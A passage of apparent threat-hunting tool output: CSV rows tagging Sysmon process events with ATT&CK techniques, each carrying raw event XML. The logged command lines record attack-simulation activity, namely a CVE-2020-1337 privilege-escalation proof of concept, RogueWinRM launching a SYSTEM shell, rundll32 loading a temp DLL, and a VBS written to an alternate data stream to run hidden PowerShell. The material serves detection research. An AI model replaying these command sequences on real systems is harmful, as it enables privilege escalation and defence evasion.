<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
</TimeCreated>
<EventRecordID>2164892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
<Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
<Data Name=""ProcessId"">6636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\windows\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
<Data Name=""ParentProcessId"">18404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:03.487498Z"">
</TimeCreated>
<EventRecordID>342414</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:03.484</Data>
<Data Name=""ProcessGuid"">747F3D96-E93B-5F33-0000-0010C1B40E00</Data>
<Data Name=""ProcessId"">7888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:45.087155Z"">
</TimeCreated>
<EventRecordID>243570</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:45.082</Data>
<Data Name=""ProcessGuid"">747F3D96-9F7D-5E75-0000-00104E062100</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
<Data Name=""ParentProcessId"">2416</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-24T01:13:50.327170Z"">
</TimeCreated>
<EventRecordID>196371</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2812"" ThreadID=""3656"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-24 01:13:50.301</Data>
<Data Name=""ProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
<Data Name=""ProcessId"">1516</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CA4B-5EC9-0000-0010B8CB3700</Data>
<Data Name=""ParentProcessId"">3960</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe</Data>
<Data Name=""ParentCommandLine"">RogueWinRM.exe -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:48.909935Z"">
</TimeCreated>
<EventRecordID>8114</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.894</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-00106C871A00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;cmd&quot;</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ParentProcessId"">816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:02.552084Z"">
</TimeCreated>
<EventRecordID>342413</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:02.548</Data>
<Data Name=""ProcessGuid"">747F3D96-E93A-5F33-0000-001014B30E00</Data>
<Data Name=""ProcessId"">7868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:52:23.500263Z"">
</TimeCreated>
<EventRecordID>11238</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:52:23.484</Data>
<Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001046950F00</Data>
<Data Name=""ProcessId"">2812</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
<Data Name=""ParentProcessId"">1900</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
</TimeCreated>
<EventRecordID>423994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ProcessId"">3396</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
<Data Name=""ParentProcessId"">7624</Data>
<Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
<Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
</EventData>
